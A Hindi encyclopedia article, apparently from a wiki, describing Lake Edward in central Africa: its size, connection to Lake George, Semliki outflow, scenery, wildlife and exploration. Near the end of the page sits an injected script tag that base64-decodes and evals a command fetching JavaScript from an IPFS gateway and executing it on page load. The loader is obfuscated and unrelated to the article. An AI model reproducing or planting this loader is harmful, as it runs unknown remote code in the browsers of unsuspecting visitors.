एडवर्ड झील

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

एडवर्ड मध्य अफ्रीका की एक प्रमुख झील है। पहले यह अल्बर्ट-एडवर्ड-न्यांजा के नाम से विख्यात थी। यह अल्बर्टाइन धसान घाटी में स्थित, फैली हुई तथा प्राय: अंडाकार है। इसका किनारा बहुत कम कटा छँटा है।

  • एडवर्ड झील उत्तर-पूर्व में 25 मील लंबी तथा 2 फर्लांग से लेकर 1 मील तक चौड़ी जलधारा द्वारा द्वेरू झील से मिली हुई है, जो विषुवत्‌ रेखा के उत्तर तक फैली है। यह झील 44 मील लंबी और 32 मील चौड़ी हैं। दोनों झीलों का क्षेत्रफल लगभग 820 वर्ग मील है।
  • इस झील का एकमात्र निकास, सेमलीकी, इसके उत्तर-पश्चिमी छोर पर है।
  • झील की सुषमा बड़ी मनोहर है। सूखे मौसम में जल के ऊपर कुहरा-सा छाया रहता है, जिससे आसपास की पहाड़ियाँ बिलकुल दिखलाई नहीं पड़ती हैं। वर्षा ऋतु में जब आकाश स्वच्छ रहता है तो पश्चिम और उत्तर-पश्चिम की ओर झील को घेरे हुए पर्वतों की छटा देखते ही बनती है।
  • एडवर्ड झील का जल निर्मल, हल्के हरे रंग का है। इसमें मछलियों और जलकुक्कुटों की भरमार है। घड़ियाल और दरियाई घोड़े दक्षिणी दलदली भागों में मिलते हैं।
  • झील के पूरे क्षेत्र का पता सन्‌ 1902-1904 ई. के आंग्ल-जर्मन सीमा आयोग के कार्यो से चला था। इसे खोजने का श्रेय मुख्यत: एच.एम. स्टेनली को है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख